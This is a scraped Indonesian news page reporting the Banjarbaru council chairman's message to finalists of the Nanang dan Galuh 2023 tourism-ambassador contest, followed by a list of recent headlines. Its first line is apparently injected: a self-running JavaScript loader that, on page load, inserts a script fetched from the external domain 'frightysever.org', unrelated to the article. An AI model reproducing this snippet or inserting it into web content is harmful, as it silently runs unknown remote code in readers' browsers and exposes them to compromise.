(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD BANJARBARU

Kedatangan Finalis Naga 2023, Ini Pesan Ketua DPRD Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Ketua DPRD Banjarbaru Fadliansyah meminta agar Nanang dan Galuh yang masih menjalani seleksi pemilihan lebih gencar mempromosikan tempat wisata di ibu kota Kalsel.

“Nanang dan Galuh Banjarbaru harus berperan aktif dan lebih gencar lagi mempromosikan tempat wisata Banjarbaru,” ujarnya, Selasa (25/7/2023).

Ketua DPRD didampingi Ketua Gatriwara Salma Mellenia dan Wakil Ketua I DPRD Taufik Rachman menerima kunjungan delapan pasangan finalis Nanang dan Galuh 2023.

Menurut Fadliansyah, Nanang dan Galuh harus mampu menjadi sosok yang berperan dalam pengembangan pariwisata Banjarbaru yang banyak memiliki sejumlah potensi wisata untuk dikembangkan.

Fadliansyah menyebutkan, potensi kawasan wisata yang dimiliki Kota Idaman seperti kampung tematik yang tersebar di sejumlah kawasan harus lebih dipromosikan melalui peran putra putri pariwisata itu.

“Banyak potensi wisata di Kota Banjarbaru yang masih memerlukan promosi seperti Kampung Iwak, Kampung Pelangi, Kampung Pejabat dan lainnya yang harus dikenalkan kepada berbagai pihak,” ucapnya.

Diharapkannya, melalui promosi yang lebih gencar dari duta pariwisata Banjarbaru itu, semua potensi yang dimiliki ibu kota Provinsi Kalsel bisa semakin berkembang dan semakin banyak dikunjungi wisatawan.

Perwakilan finalis Galuh Farah mengucapkan terima kasih pada unsur pimpinan DPRD Banjarbaru dan Ketua Gatriwara yang sudah menyambut kedatangan mereka di gedung wakil rakyat.

“Kami berterima kasih disambut dengan baik dan pesan yang telah disampaikan akan dijalankan agar pariwisata di Banjarbaru semakin maju dan berkembang dikunjungi banyak wisatawan,” katanya. (Kanalkalimantan.com/bie)

Editor : kk


Muhammad Andi

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

8 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

9 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

9 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

9 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

9 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

9 jam ago

This website uses cookies.